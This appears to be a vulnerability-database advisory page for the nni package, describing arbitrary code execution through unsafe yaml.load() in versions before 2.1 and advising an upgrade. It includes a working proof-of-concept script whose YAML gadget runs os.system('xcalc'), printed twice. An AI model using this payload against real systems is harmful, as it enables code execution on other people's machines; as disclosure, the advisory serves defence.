Vulnerability	Vulnerable Version
C Arbitrary Code Execution nni is a Neural Network Intelligence package Affected versions of this package are vulnerable to Arbitrary Code Execution due to a use of a known vulnerable function `yaml.load()`. How to fix Arbitrary Code Execution? Upgrade `nni` to version 2.1 or higher.	[,2.1)
H Arbitrary Code Execution nni is a Neural Network Intelligence package Affected versions of this package are vulnerable to Arbitrary Code Execution. Arbitrary code execution is possible due to a use of a known vulnerable function `load()` within yaml parsing. PoC 1. Create the following PoC file: exploit.py import os os.system('pip3 install nni') exploit = """authorName: !!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('xcalc')" experimentName: example_mnist_pytorch trialConcurrency: 1 maxExecDuration: 1h maxTrialNum: 10 #choice: local, remote, pai trainingServicePlatform: local searchSpacePath: search_space.json #choice: true, false useAnnotation: false tuner: #choice: TPE, Random, Anneal, Evolution, BatchTuner, MetisTuner, GPTuner #SMAC (SMAC should be installed through nnictl) builtinTunerName: TPE classArgs: #choice: maximize, minimize optimize_mode: maximize trial: command: python3 mnist.py codeDir: . gpuNum: 0 """ open('exploit.yml','w+').write(exploit) os.system('nnictl create --config exploit.yml') 2. Execute the following commands in another terminal: python3 exploit.py 3. Check the Output: xcalc will pop up. How to fix Arbitrary Code Execution? Upgrade `nni` to version 2.1 or higher.	[,2.1)

Arbitrary Code Execution

nni is a Neural Network Intelligence package

Affected versions of this package are vulnerable to Arbitrary Code Execution due to a use of a known vulnerable function yaml.load().

How to fix Arbitrary Code Execution?

Upgrade nni to version 2.1 or higher.

[,2.1)

Arbitrary Code Execution

nni is a Neural Network Intelligence package

Affected versions of this package are vulnerable to Arbitrary Code Execution. Arbitrary code execution is possible due to a use of a known vulnerable function load() within yaml parsing.

PoC

1. Create the following PoC file: exploit.py

import os
os.system('pip3 install nni')
exploit = """authorName: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
experimentName: example_mnist_pytorch
trialConcurrency: 1
maxExecDuration: 1h
maxTrialNum: 10
#choice: local, remote, pai
trainingServicePlatform: local
searchSpacePath: search_space.json
#choice: true, false
useAnnotation: false
tuner:
#choice: TPE, Random, Anneal, Evolution, BatchTuner, MetisTuner, GPTuner
#SMAC (SMAC should be installed through nnictl)
builtinTunerName: TPE
classArgs:
#choice: maximize, minimize
optimize_mode: maximize
trial:
command: python3 mnist.py
codeDir: .
gpuNum: 0
"""
open('exploit.yml','w+').write(exploit)
os.system('nnictl create --config exploit.yml')

2. Execute the following commands in another terminal: python3 exploit.py
3. Check the Output: xcalc will pop up.

How to fix Arbitrary Code Execution?

Upgrade nni to version 2.1 or higher.

[,2.1)

Go back to all versions of this package